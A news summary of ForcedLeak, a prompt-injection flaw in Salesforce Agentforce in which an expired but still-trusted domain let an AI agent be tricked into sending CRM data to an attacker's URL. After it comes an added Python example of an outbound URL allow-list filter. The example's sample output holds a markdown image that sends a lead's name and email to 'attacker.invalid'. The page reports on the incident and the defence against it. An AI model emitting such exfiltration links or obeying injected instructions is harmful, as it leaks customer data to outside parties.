
"A now-fixed flaw in Salesforce's Agentforce could have allowed external attackers to steal sensitive customer data via prompt injection, according to security researchers who published a proof-of-concept attack on Thursday. They were aided by an expired trusted domain that they were able to buy for a measly five bucks. Agentforce is the CRM giant's tool for creating AI agents to automate various tasks. The vulnerability stems from a DNS misconfiguration within the agentic AI platform."
"Salesforce declined to answer The Register's questions about ForcedLeak, including whether the flaw was abused and sensitive data disclosed, but told us it had fixed the flaw. As of September 8, the company began enforcing trusted URL allow-lists for its Agentforce and Einstein Generative AI agents to ensure that no one can call a malicious link through prompt injection. "Salesforce is aware of the vulnerability reported by Noma and has released patches that prevent output in Agentforce agents from being sent to untrusted URLs," a Salesforce spokesperson told The Register in an emailed statement."
A DNS misconfiguration in Salesforce Agentforce, combined with an expired but still-trusted domain that researchers bought cheaply, allowed AI agents to follow attacker-controlled links and exfiltrate CRM records through prompt injection. In the published proof of concept, the agent was tricked into returning sensitive customer data to an external URL on that domain; Salesforce did not say whether the flaw was abused in the wild. The vulnerability, named ForcedLeak, shows how prompt injection and untrusted external data mixed into an agent's context can break trust boundaries and turn human-AI interfaces into social engineering targets. Salesforce patched Agentforce so that agent output can no longer be sent to untrusted URLs and, from September 8, began enforcing trusted URL allow-lists for Agentforce and Einstein Generative AI agents. The issue highlights the risks of AI-integrated business tools acting on external content without human oversight.
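The mitigation the article describes is an outbound URL allow-list on agent output. The block below is an added example of such a check written for this page; it is not Salesforce's code, and the allow-listed hosts, the `.invalid` domains and the sample agent output are all constructed for illustration. It shows a naive substring match beside an exact-host match, and runs both over agent output that carries a prompt-injection style exfiltration link.

```python
"""Outbound URL allow-list for agent output (added example, not Salesforce's code).

Hypothetical setting: an agent renders links and images from its own output, so
any URL it emits may be fetched. Every URL whose host is not on the trusted
allow-list is replaced before the output is rendered, which is the property the
ForcedLeak patch is described as enforcing.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed allow-list for this example (the real list is not public).
TRUSTED_HOSTS = {"example-crm.invalid", "cdn.example-crm.invalid"}

# Matches http(s) URLs in free text; stops at whitespace, ')' , ']' , '>' and quotes
# so that markdown links/images such as ![x](https://...) are captured cleanly.
URL_RE = re.compile(r"https?://[^\s)\]>\"']+", re.IGNORECASE)


def weak_is_trusted(url: str) -> bool:
    """Naive substring check: what NOT to do. Any URL that merely contains a
    trusted host name (userinfo, subdomain, path) passes."""
    return any(h in url for h in TRUSTED_HOSTS)


def host_of(url: str) -> Optional[str]:
    """Return the normalised host the client would actually connect to, or None.

    urlsplit().hostname strips userinfo ('trusted@evil'), port and IPv6 brackets
    and lower-cases the name, so the comparison is made on the real target.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https"):
        return None
    host = parts.hostname
    if not host:
        return None
    return host.rstrip(".")  # 'example.invalid.' is the same host as 'example.invalid'


def is_trusted(url: str) -> bool:
    """Exact-host match against the allow-list: no suffix or substring matching,
    so 'example-crm.invalid.attacker.invalid' is not trusted."""
    host = host_of(url)
    return host is not None and host in TRUSTED_HOSTS


def filter_agent_output(text: str) -> Tuple[str, List[str]]:
    """Replace every untrusted URL in agent output with a placeholder.

    Returns (sanitised_text, blocked_urls). A non-empty blocked list is worth
    logging: in the ForcedLeak scenario it is the exfiltration attempt itself.
    """
    blocked: List[str] = []

    def repl(m: "re.Match[str]") -> str:
        url = m.group(0)
        if is_trusted(url):
            return url
        blocked.append(url)
        return "[blocked-untrusted-url]"

    return URL_RE.sub(repl, text), blocked


# Constructed agent output: a legitimate image plus an injected tracking image
# whose query string carries CRM data (the same pattern as a prompt-injection
# exfiltration, with made-up values).
SAMPLE_OUTPUT = (
    "Here is the lead summary you asked for.\n"
    "Logo: https://cdn.example-crm.invalid/logo.png\n"
    "![tracking](https://attacker.invalid/collect?lead=Alice%20Smith"
    "&email=alice%40example.invalid)\n"
)

if __name__ == "__main__":
    clean, blocked = filter_agent_output(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
```

The allow-list is only as strong as the domains on it: the ForcedLeak research got its link trusted by buying an expired domain that was still allow-listed, so entries should be reviewed for ownership and expiry as well as for name. That check needs registrar or DNS data and is deliberately out of scope for this offline example.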
Read at Theregister